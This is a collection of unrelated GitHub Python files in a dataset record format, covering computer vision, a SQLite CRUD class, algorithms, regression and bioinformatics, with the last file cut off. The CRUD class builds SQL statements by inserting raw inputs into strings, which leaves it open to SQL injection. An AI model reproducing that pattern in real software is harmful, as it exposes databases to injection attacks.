range(0, 2):\n new_hist = np.append(new_hist, np.array(histogram_list[x + x_new, y + y_new])) # make a histogram for just 4 cells\n # L2- normalize then clip then normalize.\n divide_value = np.sqrt(np.linalg.norm(new_hist) ** 2 + e)\n #new_table = [min(x, 0.2) for x in (new_hist / divide_value)]\n #divide_value2 = np.sqrt(np.linalg.norm(new_table) ** 2 + e)\n feature_vector.append(new_hist / divide_value) # append histogram to faturevector\n\n\n \n if (draw_arrows):\n for x in range(0, histogram_list.shape[0]):\n for y in range(0, histogram_list.shape[1]):\n center_x = x * window_size + int(window_size / 2)\n center_y = y * window_size + int(window_size / 2)\n for i, value in enumerate(histogram_list[x, y]):\n end_x = int(center_x + value * np.sin((i * 20) * np.pi / 180) )\n end_y = int(center_y + value * np.cos((i * 20) * np.pi / 180) )\n cv.arrowedLine(frame, (center_x, center_y), (end_x, end_y), (0, 0, 255))\n\n return np.reshape(feature_vector, len(feature_vector)*len(feature_vector[0])), frame\n\n\nif __name__ == \"__main__\":\n cap = cv.VideoCapture(r\"Test.mp4\")\n # Check if the webcam is opened correctly\n if not cap.isOpened():\n raise IOError(\"Cannot open webcam\")\n\n # frame = cv.imread(\"newimg3.png\")\n # frame = cv.resize(frame,(64,128))\n while True:\n ret, frame = cap.read()\n histrograms, frame = calculate_Hog(frame, True)\n\n plt.figure()\n plt.imshow(cv.cvtColor(frame, cv.COLOR_BGRA2RGB))\n plt.show()\n \n","repo_name":"Anders-Clement/P7","sub_path":"ProjectHOG/calc_hog.py","file_name":"calc_hog.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"43288779878","text":"class MyCrud:\n def __init__(self, db):\n import sqlite3\n self.conexao = sqlite3.connect(db)\n self.cur = self.conexao.cursor()\n\n def close_db(self):\n self.conexao.close()\n print('conexão fechada')\n\n def create_table(self, tb_name, coluna1, coluna2):\n self.tb_name = tb_name\n self.coluna1 = coluna1\n self.coluna2 = coluna2\n sql = f\"\"\"\n CREATE TABLE IF NOT EXISTS {self.tb_name} (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n {self.coluna1} TEXT NOT NULL,\n {self.coluna2} TEXT\n )\"\"\"\n self.cur.execute(sql)\n self.conexao.commit()\n print('tabela criada')\n\n def select(self):\n sql = \"\"\"\n SELECT * FROM clientes\"\"\"\n self.cur.execute(sql)\n resultado = self.cur.fetchall()\n for i in resultado:\n print(i)\n\n def insert(self, nome, cpf):\n self.nome = nome\n self.cpf = cpf\n sql = f\"\"\"\n INSERT INTO clientes (nome, cpf) VALUES ('{self.nome}', '{self.cpf}')\"\"\"\n self.cur.execute(sql)\n self.conexao.commit()\n print('Dados inseridos')\n\n def update(self, tb_name, coluna1, coluna2, id, dados_coluna1, dados_coluna2):\n self.tb_name = tb_name\n self.coluna1 = coluna1\n self.coluna2 = coluna2\n self.id = id\n self.dados_coluna1 = dados_coluna1\n self.dados_coluna2 = dados_coluna2\n sql = f\"\"\"UPDATE {self.tb_name}\n SET {self.coluna1} = \"{self.dados_coluna1}\", {self.coluna2} = \"{self.dados_coluna2}\"\n WHERE id = {self.id}\"\"\"\n self.cur.execute(sql)\n self.conexao.commit()\n print('Dados alterados')\n\n def delete(self, tb_name, id):\n self.tb_name = tb_name\n self.id = id\n sql = f\"\"\"\n DELETE FROM {tb_name}\n WHERE id = '{self.id}'\"\"\"\n self.cur.execute(sql)\n self.conexao.commit()\n print('Dado deletados')","repo_name":"carlosferreira-dev/UGB_SI","sub_path":"2/Programação 1/N2/Aula 10/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"13223419216","text":"from django.template import Library\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.auth.models import User\nfrom django.utils.safestring import mark_safe\nfrom hashlib import md5\n\nregister = Library()\n\n@register.filter()\ndef contenttype(value):\n\treturn ContentType.objects.get_for_model(value).pk\n\n@register.filter()\ndef gravatar(value, size = 60):\n\tif isinstance(value, User):\n\t\tvalue = value.email\n\t\n\treturn mark_safe(\n\t\t'http://www.gravatar.com/avatar/%s.jpg?d=identicon&s=%d' % (\n\t\t\tmd5(value.lower()).hexdigest(), int(size)\n\t\t)\n\t)","repo_name":"amarksteadman/bambu-tools","sub_path":"bambu-comments/bambu/comments/templatetags/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"33"} +{"seq_id":"34628354561","text":"import requests\nimport json\nimport jsonpath\n\nurl =\"https://reqres.in/api/users/2\"\n\nfile = open(\"create_user.json\")\njson_input = file.read()\nrequest_json = json.loads(json_input)\n\nresponse = requests.put(url,request_json)\nprint(response.status_code)\n\nupdatedAt = jsonpath.jsonpath(json.loads(response.content),\"updatedAt\")\nprint(updatedAt[0])\n\n\n\n\n","repo_name":"naveens33/rest.api.testing","sub_path":"update_user.py","file_name":"update_user.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10382112272","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# Reading and visualizing data using scatter plot\n\nCSV_Data = pd.read_csv(\"D:/Semester 6/Machine Learning/Assignment 1/CarPrice_Assignment.csv\")\nCSV_Data = CSV_Data.replace(np.NaN,0)\n\n#print(CSV_Data.shape)\n\n#Separating Features For Training\n\nX1 = CSV_Data.iloc[0:155,0:1]\nX2 = CSV_Data.iloc[0:155,1:2]\nX3 = CSV_Data.iloc[0:155,2:3]\nX4 = CSV_Data.iloc[0:155,3:4]\nX5 = CSV_Data.iloc[0:155,4:5]\nX6 = CSV_Data.iloc[0:155,5:6]\nY = CSV_Data.iloc[0:155,-1]\n\n#Label \n\nY = np.array(Y)\nY = Y[:,np.newaxis]\n\n#Scaling_Of_X_Features\n\ndef scaling_of_X_features(X):\n min_of_x = X.min()\n max_of_x = X.max()\n numerator = X-min_of_x\n denominator = max_of_x-min_of_x\n scaling = numerator/denominator\n return scaling\n\nscale_x1 = scaling_of_X_features(X1)\nscale_x2 = scaling_of_X_features(X2)\nscale_x3 = scaling_of_X_features(X3)\nscale_x4 = scaling_of_X_features(X4)\nscale_x5 = scaling_of_X_features(X5)\nscale_x6 = scaling_of_X_features(X6)\n\n#Scaling_Of_Y_Label\n\nmin_y = Y.min()\nmax_y = Y.max()\nscale_y_numerator = Y-min_y\nscale_y_denominator = max_y-min_y\nscale_y = scale_y_numerator/scale_y_denominator\n\n\nm,col = 155,6\nones = np.ones((m,1))\nafter_scaling_of_features = np.concatenate((ones,scale_x1,scale_x2,scale_x3,scale_x4,scale_x5,scale_x6), axis=1)\ntheta = np.zeros((7,1))\niterations = 200000\nalpha = 0.01\n\n# Defining Cost function\n\ndef Get_cost_J(X,Y,Theta):\n Pridictions = np.dot(X,Theta)\n Error = Pridictions-Y\n SqrError = np.power(Error,2)\n SumSqrError = np.sum(SqrError)\n J = (1/2*m)*SumSqrError # Where m is tototal number of rows\n return J\n\n#Defining Gradient Decent Algorithm\n\ndef Gradient_Decent_Algo(X,Y,Theta,alpha,itrations,m):\n histroy = np.zeros((itrations,1))\n for i in range(itrations):\n temp =(np.dot(X,Theta))-Y\n temp = (np.dot(X.T,temp))*alpha/m\n Theta = Theta - temp\n histroy[i] = Get_cost_J(X, Y, Theta)\n \n return (histroy,Theta)\n\nh,t = Gradient_Decent_Algo(after_scaling_of_features, scale_y, theta, alpha, iterations, m)\n\n#Values Of Theta\n\nt0 = t[0,0]\nt1 = t[1,0]\nt2 = t[2,0]\nt3 = t[3,0]\nt4 = t[4,0]\nt5 = t[5,0]\nt6 = t[6,0]\n\n#Now For Testing Of 50 Rows\n\ntesting_x1 = CSV_Data.iloc[155:206,0:1]\ntesting_x2 = CSV_Data.iloc[155:206,1:2]\ntesting_x3 = CSV_Data.iloc[155:206,2:3]\ntesting_x4 = CSV_Data.iloc[155:206,3:4]\ntesting_x5 = CSV_Data.iloc[155:206,4:5]\ntesting_x6 = CSV_Data.iloc[155:206,5:6]\ntesting_y = CSV_Data.iloc[155:206,6:7]\n\n#Scaling Of Testing Features\n\nscale_testing_x1 = scaling_of_X_features(testing_x1)\nscale_testing_x2 = scaling_of_X_features(testing_x2)\nscale_testing_x3 = scaling_of_X_features(testing_x3)\nscale_testing_x4 = scaling_of_X_features(testing_x4)\nscale_testing_x5 = scaling_of_X_features(testing_x5)\nscale_testing_x6 = scaling_of_X_features(testing_x6)\n\n#Now we find out prediction of testing data\n\noness = np.ones((50,1))\nconcatenation_of_features = np.concatenate((oness,scale_testing_x1,scale_testing_x2,scale_testing_x3,scale_testing_x4,scale_testing_x5,scale_testing_x6), axis=1)\nprediction_of_testing_features = np.dot(concatenation_of_features,t)\n\nmin_test_y = testing_y.min()\nmax_test_y = testing_y.max()\n\nfinal_prediction_salary_price = np.zeros([50,1])\nfor i in range(0,50):\n final_prediction_salary_price[i,0] = prediction_of_testing_features[i,0]*(max_test_y-min_test_y)+min_test_y\nprint(final_prediction_salary_price) \n\n\n\n\n\n","repo_name":"Roshaan-Ullah-Zaheer1/ML-Code-Samples","sub_path":"excercise_3_Linear_Regression.py","file_name":"excercise_3_Linear_Regression.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"70024654495","text":"from typing import NamedTuple\nfrom enum import Enum, auto\n\n\nclass Coordinate(NamedTuple):\n row: int\n column: int\n\n\nclass FoldDirection(Enum):\n ROW = auto()\n COLUMN = auto()\n\n\nclass Fold(NamedTuple):\n fold_axis: FoldDirection\n place: int\n\n\nmatrix: set[Coordinate] = set()\nfold_instructions: list[Fold] = []\n\n\nwith open(\"day_13/input.txt\") as puzzle_input:\n coordinates, raw_fold_instructions = puzzle_input.read().strip().split(\"\\n\\n\", 2)\n\nfor line in coordinates.split(\"\\n\"):\n column, row = line.strip().split(\",\")\n matrix.add(Coordinate(int(row), int(column)))\n\nfor instruction in raw_fold_instructions.split(\"\\n\"):\n instruction = instruction.rsplit(\" \", 1)\n axis, place = instruction[1].split(\"=\")\n fold_direction: FoldDirection\n if axis == \"x\":\n fold_direction = FoldDirection.COLUMN\n elif axis == \"y\":\n fold_direction = FoldDirection.ROW\n fold_instructions.append(Fold(fold_direction, int(place)))\n\n# Part 1\n\ndef fold_matrix(matrix: set[Coordinate], fold_instructions: list[FoldDirection]) -> set[Coordinate]:\n for fold_instruction in fold_instructions:\n index: int\n if fold_instruction.fold_axis == FoldDirection.ROW:\n index = 0\n elif fold_instruction.fold_axis == FoldDirection.COLUMN:\n index = 1\n\n new_matrix: set[Coordinate] = set()\n for coordinate in matrix:\n if coordinate[index] > fold_instruction.place:\n diff = coordinate[index] - fold_instruction.place\n\n new_coord: Coordinate\n if fold_instruction.fold_axis == FoldDirection.ROW:\n row = coordinate.row - (2 * diff)\n new_coord = Coordinate(row, coordinate.column)\n elif fold_instruction.fold_axis == FoldDirection.COLUMN:\n column = coordinate.column - (2 * diff)\n new_coord = Coordinate(coordinate.row, column)\n\n new_matrix.add(new_coord)\n\n else:\n new_matrix.add(coordinate)\n\n matrix = new_matrix\n\n return new_matrix\n\n\nmatrix = fold_matrix(matrix, [fold_instructions.pop(0)])\n\nprint(\"Part 1:\")\nprint(len(matrix))\n\n# Part 2:\n\nmatrix = fold_matrix(matrix, fold_instructions)\n\ndisplay: list[list[str]] = [[\" \" for _ in range(40)] for _ in range(6)]\nfor coordinate in matrix:\n display[coordinate.row][coordinate.column] = \"x\"\n\nfor line in display:\n print(\"\".join(line))\n","repo_name":"ndhansen/advent_of_code_2021","sub_path":"day_13/day_13.py","file_name":"day_13.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23908987094","text":"# https://www.acmicpc.net/problem/12104\n\n\ndef failure(string):\n table = [0] * len(string)\n j = 0\n for i in range(1, len(string)):\n while j > 0 and string[i] != string[j]:\n j = table[j - 1]\n\n if string[i] == string[j]:\n j += 1\n table[i] = j\n\n return table\n\n\ndef KMP(string, pattern):\n ls = len(string)\n lp = len(pattern)\n table = failure(pattern)\n j = 0\n cnt = 0\n for i in range(ls):\n while j > 0 and string[i] != pattern[j]:\n j = table[j - 1]\n\n if string[i] == pattern[j]:\n if j == lp - 1:\n cnt += 1\n j = table[j]\n else:\n j += 1\n return cnt\n\n\nA = input()\nB = input()\nB *= 2\nprint(KMP(B[:-1], A))\n","repo_name":"h-spear/problem-solving-python","sub_path":"baekjoon/string/cycle_permutation.py","file_name":"cycle_permutation.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"22843693207","text":" # Error handling\n\n# sample usage\n# try: # will try run this code in try block, only if any error occur control get into except block\n# age = int(input(\"what is your age? \"))\n# except: # if there is any error then access will go into the except block and does whatever inside except\n# print(\"please enter a number\")\n\n# built in exceptions list: https://docs.python.org/3/library/exceptions.html\n# We can directly mention these in the except\n\nwhile True: # using while loop to end on receiving the valid value\n try:\n age = int(input(\"what is your age? \"))\n except ValueError:\n print('please enter a Number')\n else: # if value is number then we can break loop\n print(\"Thanks!!\")\n break\n","repo_name":"Sridhar36/python_zero_to_master","sub_path":"7_advanced_python_4_error_handling/error_handling_use_try_except_else_blocks_1.py","file_name":"error_handling_use_try_except_else_blocks_1.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"21488339311","text":"import random\n\n\nclass Node:\n data = None\n next = None\n prev = None\n\n def __init__(self, data, prev=None, next=None):\n self.data = data\n self.next = next\n self.prev = prev\n\n def __str__(self):\n return str(self.data)\n\n\nclass Dlinkedl:\n head = None\n last = None\n length = 0\n\n def insert_at_begin(self, data):\n node = Node(data)\n if self.head is None:\n self.head = node\n self.last = node\n else:\n self.head.prev = node\n node.next = self.head\n self.head = node\n self.length += 1\n\n def insert_at_end(self, data):\n node = Node(data)\n self.last.next = node\n node.prev = self.last\n self.last = node\n self.length += 1\n\n def delete(self, node):\n pass\n\n def delete_first(self):\n head = self.head\n self.head = head.next\n self.head.prev = None\n head = None\n self.length -= 1\n\n def delete_last(self):\n last = self.last\n self.last = last.prev\n self.last.next = None\n last = None\n\n self.length -= 1\n\n def insert(self, node, data):\n new_node = Node(data)\n next = node.next\n node.next = new_node\n new_node.prev = node\n next.prev = new_node\n new_node.next = next\n\n def find(self, data):\n current = self.head\n while (current is not None):\n if current.data == data:\n return current\n current = current.next\n\n return None\n\n def display_forward(self):\n str_rpr = \"\"\n current = self.head\n while current is not None:\n str_rpr = self._format(str_rpr, current, current.next)\n current = current.next\n\n print(str_rpr)\n\n def display_backward(self):\n str_rpr = \"\"\n current = self.last\n while (current is not None):\n str_rpr = self._format(str_rpr, current, current.prev)\n current = current.prev\n print(str_rpr)\n\n @staticmethod\n def _format(string, data, last):\n if last is not None:\n string += \"{},\".format(data)\n else:\n string += \"{}\".format(data)\n\n return string\n\n def sort(self):\n for _ in range(0, self.length):\n current = self.head\n while current.next is not None:\n if current.data > current.next.data:\n tmp = current.data\n current.data = current.next.data\n current.next.data = tmp\n current = current.next\n","repo_name":"inkoguto/ds","sub_path":"ds/dlinkedl.py","file_name":"dlinkedl.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25454403026","text":"#!/usr/bin/python3\nimport sys\nargv = sys.argv\n\n\ndef main():\n\n length = len(argv)\n\n if length > 2:\n print(\"{} arguments:\".format(length - 1))\n for i in range(1, length):\n print(\"{}: {}\".format(i, argv[i]))\n\n elif length == 1:\n print(\"0 arguments.\")\n\n elif length == 2:\n print(\"1 argument:\")\n print(\"{}: {}\".format(length - 1, argv[1]))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"callmejoee/alx-higher_level_programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20966745958","text":"kodeKaryawan = input(\"Masukkan kode karyawan : \")\nnamaKaryawan = input(\"Masukkan nama karyawan : \")\ngolongan = input(\"Masukkan golongan : \")\n\nif(golongan == \"A\"):\n gajiPokok = 10000000\n potongan = 2.5\n jumlahPotongan = 2.5 / 100 * 10000000\n \nelif(golongan == \"B\"):\n gajiPokok = 8500000\n potongan = 2.0\n jumlahPotongan = 2. / 100 * 8500000\n \nelif(golongan == \"C\"):\n gajiPokok = 7000000\n potongan = 1.5\n jumlahPotongan = 1.5 / 100 * 7000000\n \nelif(golongan == \"D\"):\n gajiPokok = 5500000\n potongan = 1.0\n jumlahPotongan = 1.0 / 100 * 5500000\n\nstatus = int (input (\"Masukkan status(1: menikah, 2: belum) : \"))\nif(status == 1):\n tunjanganMenikah = gajiPokok * 10/100\n jumlahAnak = int(input (\"Masukkan jumlah anak : \"))\n tunjanganAnak = gajiPokok * 5/100 * jumlahAnak\nelif(status==2):\n tunjanganMenikah = 0\n jumlahAnak = 0\n tunjanganAnak = 0\n\nprint(\"====================================\")\n\nprint(\"STRUK RINCIAN GAJI KARYAWAN\")\n\nprint(\"-----------------------------------------------------------\")\n\nprint(\"Nama Karyawan : \" + namaKaryawan + \"(Kode Karyawan : \" + str(kodeKaryawan) + \")\")\nprint(\"Golongan : \" + golongan)\n\nif(status == 1):\n print (\"Status Menikah : Sudah Menikah\")\n print (\"Jumlah Anak : \" , jumlahAnak)\nelse:\n print (\"Status Menikah : Belum Menikah\")\n\nprint(\"-----------------------------------------------------------\")\n\nprint(\"Gaji Pokok : Rp\" + str(gajiPokok))\nprint(\"Tunjangan Istri/Suami : Rp\" + str(tunjanganMenikah))\nprint(\"Tunjangan Anak : Rp\" + str(tunjanganAnak))\n\nprint(\"-----------------------------------------------------------\")\n\ngajiKotor = gajiPokok + tunjanganMenikah + tunjanganAnak\nprint(\"Gaji Kotor : Rp\" + str(gajiKotor))\npotonganGaji = int(gajiKotor * potongan/100)\nprint(\"Potongan (\" + str(potongan) + \"%): Rp\" + str(potonganGaji))\n\nprint(\"-----------------------------------------------------------\")\n\ngajiBersih = gajiKotor - potonganGaji\nprint(\"Gaji Bersih : Rp\" + str(gajiBersih))\n\n\n\n\n\n\n\n\n","repo_name":"LucianaYansan/PythonProjectsProtek","sub_path":"Praktikum 5/Latihan 01/latihan5.py","file_name":"latihan5.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29947596279","text":"import traceback\n\nimport gevent\nimport structlog\nfrom gevent.event import AsyncResult\n\nlog = structlog.get_logger(__name__)\n\n\ndef raise_on_failure(raiden_apps, test_function, **kwargs):\n \"\"\"Wait on the result for the test function and any of the apps.\n\n This utility should be used for happy path testing with more than one app.\n This will raise if any of the apps is killed.\n \"\"\"\n result = AsyncResult()\n\n # Do not use `link` or `link_value`, an app an be stopped to test restarts.\n for app in raiden_apps:\n assert app.raiden, \"The RaidenService must be started\"\n app.raiden.link_exception(result)\n\n test_greenlet = gevent.spawn(test_function, **kwargs)\n test_greenlet.link(result)\n\n # Returns if either happens:\n # - The test finished (successfully or not)\n # - One of the apps crashed during the test\n try:\n result.get()\n except: # noqa\n # Print the stack trace of the running test to know in which line the\n # test is waiting.\n #\n # This may print a duplicated stack trace, when the test fails.\n log.exception(\n \"Test failed\",\n test_traceback=\"\".join(traceback.format_stack(test_greenlet.gr_frame)),\n all_tracebacks=\"\\n\".join(gevent.util.format_run_info()),\n )\n\n raise\n","repo_name":"prospect-man/raiden","sub_path":"raiden/tests/utils/detect_failure.py","file_name":"detect_failure.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"36822378162","text":"'''\n\nKaren Sommer\n\nCS 521 Spring 2021\n\nAssignment 11\n\nProblem 2 pages 685\n\n'''\n\nimport os\nimport shutil\n\n\n#path = '/Users/karensommer/github/CS521_InformationStructuresWithPython/ksommer@bu_edu_hw_11/hw_11_2.txt'\npath = 'hw_11_2.txt'\n#target= '/Users/karensommer/github/CS521_InformationStructuresWithPython/ksommer@bu_edu_hw_11/target_11_2.txt'\ntarget='target_11_2.txt'\n\nif target.rfind('/')!=-1:\n target_folder=(target[:target.rfind('/')])\n # if target folder exists\n isExist_trg = os.path.exists(target_folder)\nelse:\n #assign the true by default because is going to store it in the root folder\n isExist_trg=True\n\n# check if source path exists\nisExist_src = os.path.exists(path)\n#get extension of dource path\nextension = os.path.splitext(path)[1]\nif extension=='.txt' and isExist_src and isExist_trg:\n # check if the file exists\n isExist_file_target = os.path.exists(target)\n #print(isExist_file_target)\n if isExist_file_target:\n option=input('Do you want to overwrite the file y/n ?')\n if option.lower()=='y':\n #Make the copy\n shutil.copyfile(path, target)\n print('File copied!')\n else:\n print('File not copied')\n else:\n #Make the copy\n shutil.copyfile(path, target)\nelse:\n print('Invalid extension or src file not found or dest path not found')\n","repo_name":"ksommerh94/CS521_InformationStructuresWithPython","sub_path":"ksommer@bu_edu_hw_11/ksommer@bu_edu_hw_11_2.py","file_name":"ksommer@bu_edu_hw_11_2.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22947740149","text":"'''\nhistory = 2013.05.13, 2013_05_19, 2013_05_24\n'''\n#-----------------------------------------------------------------------------------------------\nimport os, Raxpy3Libbasic_2013_06_10\n#-----------------------------------------------------------------------------------------------\nRaxLib = Raxpy3Libbasic_2013_06_10\n\nclass dataTCGA:\n \n def __init__(self):\n \n #file list\n self.isomiR_class_list = []\n \n #genome file\n self.hg_obj_name = ['chr1.fa', 'chr2.fa', 'chr3.fa', 'chr4.fa', 'chr5.fa',\n 'chr6.fa', 'chr7.fa', 'chr8.fa', 'chr9.fa', 'chr10.fa',\n 'chr11.fa', 'chr12.fa', 'chr13.fa', 'chr14.fa', 'chr15.fa',\n 'chr16.fa', 'chr17.fa', 'chr18.fa', 'chr19.fa', 'chr20.fa',\n 'chr21.fa', 'chr22.fa', 'chrM.fa', 'chrX.fa', 'chrY.fa']\n self.hg_obj_index = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10',\n '11', '12', '13', '14', '15', '16', '17', '18', '19', '20',\n '21', '22', 'M', 'X', 'Y']\n self.hg_obj_list = [[]]*25\n \n #percursor file\n self.percursor = 'obj'\n \n #hsamiRNA file\n self.mature_miRNA = 'obj'\n \n #hsamatchtable\n self.matchtable = 'obj'\n \n #hsalocationtable\n self.locationtable = 'obj'\n \n #-----------------------------------------------------------------------------------------------\n \n def openHumangenome(self):\n \n ori_path = os.getcwd()\n os.chdir('/home/tin/Lib/Lib/hg19')\n chromosome = 'obj'\n \n for genomefile in self.hg_obj_name:\n \n print(str(genomefile)+' is opening !! (' + str(len([x for x in self.hg_obj_list if x != []])) + '/25)')\n chromosome = RaxLib.openFastAfile()\n chromosome.open(genomefile)\n self.hg_obj_list[self.hg_obj_name.index(genomefile)] = chromosome\n \n os.chdir(ori_path)\n \n return\n \n #-----------------------------------------------------------------------------------------------\n \n def openhsamiRNA(self):\n \n ori_path = os.getcwd()\n #take miRNA from mature\n os.chdir('/home/tin/Lib/Lib/hsamiRNA/')\n mature_miRNA = RaxLib.openFastAfile()\n mature_miRNA.open('hsaV1.fa')\n self.mature_miRNA = mature_miRNA\n \n os.chdir(ori_path)\n \n return\n \n #-----------------------------------------------------------------------------------------------\n \n def openpercursor(self):\n \n ori_path = os.getcwd()\n #take percursor from hairpin\n os.chdir('/home/tin/Lib/Lib/miRNApercursor')\n percursor = RaxLib.openFastAfile()\n percursor.open('hairpin.fa')\n self.percursor = percursor\n \n os.chdir(ori_path)\n \n return\n \n #-----------------------------------------------------------------------------------------------\n \n def openmatchtable(self):\n \n ori_path = os.getcwd()\n #take hsaprecursor and hsamiRNA matchtable\n os.chdir('/home/tin/Lib/Lib/hsa_match_table/')\n matchtable = RaxLib.tabfilewithtitle()\n matchtable.open('group_table8.txt', 'order')\n self.matchtable = matchtable\n \n os.chdir(ori_path)\n \n return\n \n #-----------------------------------------------------------------------------------------------\n \n def openlocationtable(self):\n \n ori_path = os.getcwd()\n #take hsaprecursor and hsamiRNA locationtable\n os.chdir('/home/tin/Lib/Lib/hsagff3_location/')\n gff3table = RaxLib.tabfilewithtitle()\n gff3table.open('hsagff3modifyhsaV2.txt', 'order')\n self.locationtable = gff3table\n \n os.chdir(ori_path)\n \n return\n \n #-----------------------------------------------------------------------------------------------\n \n class isomiR:\n \n def __init__(self):\n \n #miRNA\n self.miRNA = \"\"\n self.situation = \"\"\n self.mature_3p_start = 0.0\n self.mature_3p_end = 0.0\n self.mature_5p_start = 0.0\n self.mature_5p_end = 0.0\n \n #percursor\n self.percursor_hairpin = \"\"\n self.percursor_sequence = \"\"\n self.percursor_h_sequence_ali = \"\"\n self.percursor_genome_left = 0\n self.percursor_genome_right = 0\n \n #genome\n self.genome_sequence = \"\"\n self.genome_chromosome = \"\"\n self.genome_version = \"\"\n self.genome_strand = \"\"\n self.genome_left = 0\n self.genome_right = 0\n \n #table\n self.isomiR_tabfilewithtitle = 'obj'\n \n #-----------------------------------------------------------------------------------------------\n \n def process1(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #find sequence for isomiR\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n \n miRNA_list = tabT.title_box[tabT.title_dicX['miRNA_ID']-1]\n \n if len({}.fromkeys(miRNA_list).keys()) == 0:\n print('miRNA input Error !')\n quit()\n elif len({}.fromkeys(miRNA_list).keys()) == 1:\n miRNA = \"\".join({}.fromkeys(miRNA_list).keys())\n else:\n print('miRNA is more then one type in this block.')\n quit()\n self.miRNA = miRNA\n \n print(self.miRNA+' in processing 1 !')\n sequence_list = []\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n \n left_location_list = []\n right_location_list = []\n for key in main_key_list:\n \n W = \"\"\n E = key.split(':')\n \n #take the chromosome obj\n os.chdir('/home/tin/Lib/Lib/hg19')\n chromosome = 'obj'\n \n W = \"\".join([x for x in C1.hg_obj_index if x.find(str(E[1]).upper()) != -1 and len(x) == len(str(E[1]).upper())]) \n \n if C1.hg_obj_list[C1.hg_obj_index.index(W)] == []:\n print(str(C1.hg_obj_name[C1.hg_obj_index.index(W)])+' is opening !! (' + str(len([x for x in C1.hg_obj_list if x != []])) + '/25)')\n chromosome = RaxLib.openFastAfile()\n chromosome.open(C1.hg_obj_name[C1.hg_obj_index.index(W)])\n C1.hg_obj_list[C1.hg_obj_index.index(W)] = chromosome\n \n \n else:\n chromosome = C1.hg_obj_list[C1.hg_obj_index.index(W)]\n \n os.chdir(ori_path)\n \n #take the sequence from chromosome obj \n isomiR_sequence = \"\"\n left_location = \"\".join(E[2].split('-')[0])\n left_location_list.append(left_location)\n right_location = \"\".join(E[2].split('-')[1])\n right_location_list.append(right_location)\n if E[-1] == '+':\n isomiR_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[int(left_location)-1:int(right_location)]\n elif E[-1] == '-':\n isomiR_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[int(left_location)-1:int(right_location)]\n isomiR_sequence = RaxLib.ntComRev(isomiR_sequence, 'Ucase', 'r')\n sequence_list.append(isomiR_sequence.replace('T', 'U'))\n \n left_location_list.sort()\n right_location_list.sort()\n genome_left = int(left_location_list[0]) - 50\n genome_right = int(right_location_list[-1]) + 50\n \n #add the sequence_list to table obj\n tabT.append('X', 'isomiR_sequence', sequence_list)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n self.genome_left = genome_left\n self.genome_right = genome_right\n self.genome_chromosome = main_key_list[0].split(':')[1]\n self.genome_version = main_key_list[0].split(':')[0]\n self.genome_strand = main_key_list[0].split(':')[-1]\n \n if self.genome_right-self.genome_left < 200:\n self.situation = 'OK'\n else:\n self.situation = 'NO'\n \n genome_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[self.genome_left-1:self.genome_right]\n if main_key_list[0].split(':')[-1] == '+':\n genome_sequence = genome_sequence\n elif main_key_list[0].split(':')[-1] == '-':\n genome_sequence = RaxLib.ntComRev(genome_sequence, 'Ucase', 'r')\n self.genome_sequence = genome_sequence.upper()\n \n Num = \"\".join(filter(str.isdigit, self.miRNA))\n miRNA_ID = \"\".join([x for x in C1.mature_miRNA.FastA_dictionary.keys() if Num in x])\n if miRNA_ID == \"\":\n self.situation = 'NO'\n else:\n self.situation = 'OK'\n \n os.chdir(ori_path)\n \n return tabT\n \n def process2(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #define sequence_ali for isomiR\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 2 !')\n \n if self.situation == 'OK':\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n \n genome_sequence = self.genome_sequence\n \n percursor_sequence = genome_sequence.replace('T', 'U')\n \n #make sequence_ali of isomiR in List\n seq_ali = []\n for key in main_key_list:\n \n \n Y = ['.']*len(percursor_sequence)\n \n X = []\n seq_of_table_1 = tabT.read('isomiR_sequence', 